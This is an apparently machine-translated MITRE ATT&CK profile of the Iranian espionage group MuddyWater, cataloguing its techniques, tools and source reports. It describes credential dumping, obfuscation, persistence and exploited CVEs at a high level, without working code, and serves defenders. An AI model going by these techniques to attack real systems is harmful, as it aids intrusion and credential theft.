1. Home
  2. Groups
  3. MuddyWater

MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.[2][3][4][5][6][7][8]

ID: G0069
Associated Groups: Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450
Contributors: Ozer Sarilar, @ozersarilar, STM; Daniyal Naeem, BT Security; Marco Pedrinazzi, @pedrinazziM
Version: 5.1
Created: 18 April 2018
Last Modified: 29 August 2024

Associated Group Descriptions

Name Description
Earth Vetala

[9]
MERCURY

[10]
Static Kitten

[10][9]
Seedworm

[3][10][9]
TEMP.Zagros

[11][10][9]
Mango Sandstorm

[12]
TA450

[13]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

MuddyWater has used malware that leveraged WMI for execution and querying host information.[14][4][15][7]
Enterprise T1555 从密码存储中获取凭证

MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.[2][3][9]
.003 Credentials from Web Browsers

MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.[3][9]
Enterprise T1090 .002 代理: External Proxy

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location.[3] MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).[6][9]
Enterprise T1036 .005 伪装: Match Legitimate Name or Location

MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.[11][15][10]
Enterprise T1190 利用公开应用程序漏洞

MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).[7]
Enterprise T1137 .001 办公应用启动: Office Template Macros

MuddyWater has used a Word Template, Normal.dotm, for persistence.[6]
Enterprise T1573 .001 加密通道: Symmetric Cryptography

MuddyWater has used AES to encrypt C2 responses.[8]
Enterprise T1574 .002 劫持执行流: DLL Side-Loading

MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.[7]
Enterprise T1140 反混淆/解码文件或信息

MuddyWater has decoded base64-encoded PowerShell, JavaScript, and VBScript.[11][16][4][8]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.[11][14][15][6][9][8]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

MuddyWater has used PowerShell for execution.[11][16][14][3][4][15][6][9][7][8]
.003 命令与脚本解释器: Windows Command Shell

MuddyWater has used a custom tool for creating reverse shells.[3]
.005 命令与脚本解释器: Visual Basic

MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.[11][16][14][3][4][5][6][9][8]
.006 命令与脚本解释器: Python

MuddyWater has developed tools in Python including Out1.[9]
.007 命令与脚本解释器: JavaScript

MuddyWater has used JavaScript files to execute its POWERSTATS payload.[4][11][7]
Enterprise T1104 多阶段信道

MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.[15]

Enterprise T1562 .001 妨碍防御: Disable or Modify Tools

MuddyWater can disable the system's local proxy settings.[9]
Enterprise T1203 客户端执行漏洞利用

MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.[5]
Enterprise T1113 屏幕捕获

MuddyWater has used malware that can capture screenshots of the victim’s machine.[14]
Enterprise T1071 .001 应用层协议: Web Protocols

MuddyWater has used HTTP for C2 communications.[5][9]
Enterprise T1560 .001 归档收集数据: Archive via Utility

MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.[3]
Enterprise T1003 .001 操作系统凭证转储: LSASS Memory

MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.[2][3][9]
.004 操作系统凭证转储: LSA Secrets

MuddyWater has performed credential dumping with LaZagne.[2][3]
.005 操作系统凭证转储: Cached Domain Credentials

MuddyWater has performed credential dumping with LaZagne.[2][3]
Enterprise T1074 .001 数据分段: Local Data Staging

MuddyWater has stored a decoy PDF file within a victim's %temp% folder.[8]
Enterprise T1132 .001 数据编码: Standard Encoding

MuddyWater has used tools to encode C2 communications including Base64 encoding.[5][9]
Enterprise T1083 文件和目录发现

MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."[14]
Enterprise T1552 .001 未加密凭证: Credentials In Files

MuddyWater has run a tool that steals passwords saved in victim email.[3]
Enterprise T1027 .003 混淆文件或信息: Steganography

MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.[4]
.004 混淆文件或信息: Compile After Delivery

MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.[4]
.010 混淆文件或信息: Command Obfuscation

MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.[2][17] The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.[2][11][14][15][5][9][8]
Enterprise T1548 .002 滥用权限提升控制机制: Bypass User Account Control

MuddyWater uses various techniques to bypass UAC.[4]
Enterprise T1204 .001 用户执行: Malicious Link

MuddyWater has distributed URLs in phishing e-mails that link to lure documents.[10][9][13]
.002 用户执行: Malicious File

MuddyWater has attempted to get users to open malicious PDF attachment and to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.[2][11][14][15][5][6][10][9][7][8][13]

Enterprise T1218 .003 系统二进制代理执行: CMSTP

MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.[11]
.005 系统二进制代理执行: Mshta

MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[11][14]
.011 系统二进制代理执行: Rundll32

MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.[14]
Enterprise T1082 系统信息发现

MuddyWater has used malware that can collect the victim’s OS version and machine name.[14][15][6][9][8]
Enterprise T1033 系统所有者/用户发现

MuddyWater has used malware that can collect the victim’s username.[14][9]
Enterprise T1049 系统网络连接发现

MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.[9]
Enterprise T1016 系统网络配置发现

MuddyWater has used malware to collect the victim’s IP address and domain name.[14]
Enterprise T1102 .002 网络服务: Bidirectional Communication

MuddyWater has used web services including OneHub to distribute remote access tools.[10]
Enterprise T1583 .006 获取基础设施: Web Services

MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools.[10][9][13]
Enterprise T1588 .002 获取能力: Tool

MuddyWater has used legitimate tools ConnectWise, RemoteUtilities, and SimpleHelp to gain access to the target environment.[10][18]
Enterprise T1087 .002 账号发现: Domain Account

MuddyWater has used cmd.exe net user /domain to enumerate domain users.[9]
Enterprise T1518 软件发现

MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.[9]
.001 Security Software Discovery

MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.[14]
Enterprise T1105 输入工具传输

MuddyWater has used malware that can upload additional files to the victim’s machine.[14][4][6][9]
Enterprise T1057 进程发现

MuddyWater has used malware to obtain a list of running processes on the system.[14][5]
Enterprise T1559 .001 进程间通信: Component Object Model

MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.[14][5][7]
.002 进程间通信: Dynamic Data Exchange

MuddyWater has used malware that can execute PowerShell scripts via DDE.[14]
Enterprise T1210 远程服务漏洞利用

MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).[7]
Enterprise T1219 远程访问软件

MuddyWater has used legitimate applications ScreenConnect, AteraAgent and SimpleHelp to manage systems remotely and move laterally.[9][10][13][18]
Enterprise T1041 通过C2信道渗出

MuddyWater has used C2 infrastructure to receive exfiltrated data.[6]
Enterprise T1566 .001 钓鱼: Spearphishing Attachment

MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.[2][11][14][5][10][9] [7][13]
.002 钓鱼: Spearphishing Link

MuddyWater has sent targeted spearphishing e-mails with malicious links.[10][9][13]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

MuddyWater has used scheduled tasks to establish persistence.[6]

Software

ID Name References Techniques
S0591 ConnectWise [10][9] 命令与脚本解释器: PowerShell, 屏幕捕获, 视频捕获
S0488 CrackMapExec [19][3] Windows管理规范, 使用备用认证材料: Pass the Hash, 修改注册表, 命令与脚本解释器: PowerShell, 密码策略发现, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: NTDS, 操作系统凭证转储: LSA Secrets, 文件和目录发现, 暴力破解: Password Spraying, 暴力破解: Password Guessing, 暴力破解, 权限组发现: Domain Groups, 系统信息发现, 系统网络连接发现, 系统网络配置发现, 网络共享发现, 账号发现: Domain Account, 远程系统发现, 预定任务/作业: At
S0363 Empire [19] Windows管理规范, 中间人攻击: LLMNR/NBT-NS Poisoning and SMB Relay, 事件触发执行: Accessibility Features, 从密码存储中获取凭证: Credentials from Web Browsers, 使用备用认证材料: Pass the Hash, 创建或修改系统进程: Windows Service, 创建账户: Local Account, 创建账户: Domain Account, 剪贴板数据, 加密通道: Asymmetric Cryptography, 劫持执行流: Path Interception by Unquoted Path, 劫持执行流: Path Interception by Search Order Hijacking, 劫持执行流: Path Interception by PATH Environment Variable, 劫持执行流: Dylib Hijacking, 劫持执行流: DLL Search Order Hijacking, 可信开发者工具代理执行: MSBuild, 启动或登录自动启动执行: Security Support Provider, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 启动或登录自动启动执行: Shortcut Modification, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Windows Command Shell, 命令与脚本解释器, 域信任发现, 域或租户策略修改: Group Policy Modification, 屏幕捕获, 应用层协议: Web Protocols, 归档收集数据, 操作系统凭证转储: LSASS Memory, 文件和目录发现, 未加密凭证: Credentials In Files, 未加密凭证: Private Keys, 本机API, 权限提升漏洞利用, 浏览器信息发现, 混淆文件或信息: Command Obfuscation, 滥用权限提升控制机制: Bypass User Account Control, 电子邮件收集: Local Email Collection, 移除指标: Timestomp, 窃取或伪造Kerberos票据: Kerberoasting, 窃取或伪造Kerberos票据: Golden Ticket, 窃取或伪造Kerberos票据: Silver Ticket, 系统信息发现, 系统所有者/用户发现, 系统服务: Service Execution, 系统网络连接发现, 系统网络配置发现, 组策略发现, 网络共享发现, 网络嗅探, 网络服务: Bidirectional Communication, 网络服务发现, 自动化收集, 自动化渗出, 视频捕获, 访问令牌操控: SID-History Injection, 访问令牌操控, 访问令牌操控: Create Process with Token, 账号发现: Domain Account, 账号发现: Local Account, 软件发现: Security Software Discovery, 输入工具传输, 输入捕获: Keylogging, 输入捕获: Credential API Hooking, 进程发现, 进程注入, 远程服务: Distributed Component Object Model, 远程服务: SSH, 远程服务漏洞利用, 通过C2信道渗出, 通过网络服务渗出: Exfiltration to Code Repository, 通过网络服务渗出: Exfiltration to Cloud Storage, 预定任务/作业: Scheduled Task
S0250 Koadic [6][19] Windows管理规范, 从本地系统获取数据, 剪贴板数据, 加密通道: Asymmetric Cryptography, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: NTDS, 文件和目录发现, 滥用权限提升控制机制: Bypass User Account Control, 系统二进制代理执行: Mshta, 系统二进制代理执行: Regsvr32, 系统二进制代理执行: Rundll32, 系统信息发现, 系统所有者/用户发现, 系统服务: Service Execution, 系统网络配置发现, 网络共享发现, 网络服务发现, 输入工具传输, 进程注入: Dynamic-link Library Injection, 远程服务: Remote Desktop Protocol, 隐藏伪装: Hidden Window, 预定任务/作业: Scheduled Task
S0349 LaZagne [3][19] 从密码存储中获取凭证: Windows Credential Manager, 从密码存储中获取凭证: Credentials from Web Browsers, 从密码存储中获取凭证, 从密码存储中获取凭证: Keychain, 操作系统凭证转储: LSA Secrets, 操作系统凭证转储: /etc/passwd and /etc/shadow, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: Cached Domain Credentials, 操作系统凭证转储: Proc Filesystem, 未加密凭证: Credentials In Files
S0002 Mimikatz [2][19] 从密码存储中获取凭证, 从密码存储中获取凭证: Credentials from Web Browsers, 从密码存储中获取凭证: Windows Credential Manager, 伪造域控制器, 使用备用认证材料: Pass the Hash, 使用备用认证材料: Pass the Ticket, 启动或登录自动启动执行: Security Support Provider, 操作系统凭证转储: DCSync, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: LSA Secrets, 未加密凭证: Private Keys, 窃取或伪造Kerberos票据: Golden Ticket, 窃取或伪造Kerberos票据: Silver Ticket, 窃取或伪造身份认证证书, 访问令牌操控: SID-History Injection, 账号操控
S1047 Mori [7] 修改注册表, 反混淆/解码文件或信息, 应用层协议: Web Protocols, 应用层协议: DNS, 数据混淆: Junk Data, 数据编码: Standard Encoding, 查询注册表, 移除指标: File Deletion, 系统二进制代理执行: Regsvr32
S0594 Out1 [9] 从本地系统获取数据, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 混淆文件或信息, 电子邮件收集: Local Email Collection
S0194 PowerSploit [19] Windows管理规范, 从密码存储中获取凭证: Windows Credential Manager, 从本地系统获取数据, 创建或修改系统进程: Windows Service, 劫持执行流: Path Interception by PATH Environment Variable, 劫持执行流: Path Interception by Unquoted Path, 劫持执行流: DLL Search Order Hijacking, 劫持执行流: Path Interception by Search Order Hijacking, 反射性代码加载, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 启动或登录自动启动执行: Security Support Provider, 命令与脚本解释器: PowerShell, 域信任发现, 屏幕捕获, 操作系统凭证转储: LSASS Memory, 未加密凭证: Credentials in Registry, 未加密凭证: Group Policy Preferences, 查询注册表, 混淆文件或信息: Indicator Removal from Tools, 混淆文件或信息: Command Obfuscation, 窃取或伪造Kerberos票据: Kerberoasting, 访问令牌操控, 账号发现: Local Account, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 音频捕获, 预定任务/作业: Scheduled Task
S0223 POWERSTATS [2][11][4][3][5] Windows管理规范, 从本地系统获取数据, 代理: External Proxy, 伪装: Masquerade Task or Service, 加密通道: Asymmetric Cryptography, 反混淆/解码文件或信息, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: JavaScript, 妨碍防御: Disable or Modify Tools, 屏幕捕获, 数据编码: Standard Encoding, 混淆文件或信息: Command Obfuscation, 混淆文件或信息: Binary Padding, 移除指标: File Deletion, 系统二进制代理执行: Mshta, 系统信息发现, 系统所有者/用户发现, 系统网络配置发现, 账号发现: Local Account, 软件发现: Security Software Discovery, 输入工具传输, 进程发现, 进程间通信: Component Object Model, 进程间通信: Dynamic Data Exchange, 预定任务/作业: Scheduled Task, 预定传输
S1046 PowGoop [7] 伪装, 伪装: Match Legitimate Name or Location, 加密通道, 劫持执行流: DLL Side-Loading, 反混淆/解码文件或信息, 命令与脚本解释器: PowerShell, 应用层协议: Web Protocols, 数据编码: Non-Standard Encoding
S0592 RemoteUtilities [9] 屏幕捕获, 文件和目录发现, 系统二进制代理执行: Msiexec, 输入工具传输
S0450 SHARPSTATS [19] 命令与脚本解释器: PowerShell, 混淆文件或信息: Command Obfuscation, 系统信息发现, 系统所有者/用户发现, 系统时间发现, 系统网络配置发现, 输入工具传输
S1035 Small Sieve [7][20] 伪装: Match Legitimate Name or Location, 加密通道: Asymmetric Cryptography, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 命令与脚本解释器: Python, 应用层协议: Web Protocols, 执行保护, 数据编码: Non-Standard Encoding, 混淆文件或信息, 系统所有者/用户发现, 系统网络配置发现, 网络服务: Bidirectional Communication, 输入工具传输
S1037 STARWHALE [7] 从本地系统获取数据, 创建或修改系统进程: Windows Service, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 数据分段: Local Data Staging, 数据编码: Standard Encoding, 混淆文件或信息: Encrypted/Encoded File, 用户执行: Malicious File, 系统信息发现, 系统所有者/用户发现, 系统网络配置发现, 通过C2信道渗出

References

  1. Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
  2. Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
  3. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
  4. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  5. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
  6. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  7. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
  8. Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.
  9. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
  10. Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.
  1. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  2. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  3. Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.
  4. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  5. Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.
  6. Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.
  7. Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.
  8. Rostovcev, N. (2023, April 18). SimpleHarm: Tracking MuddyWater’s infrastructure. Retrieved July 11, 2024.
  9. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  10. NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.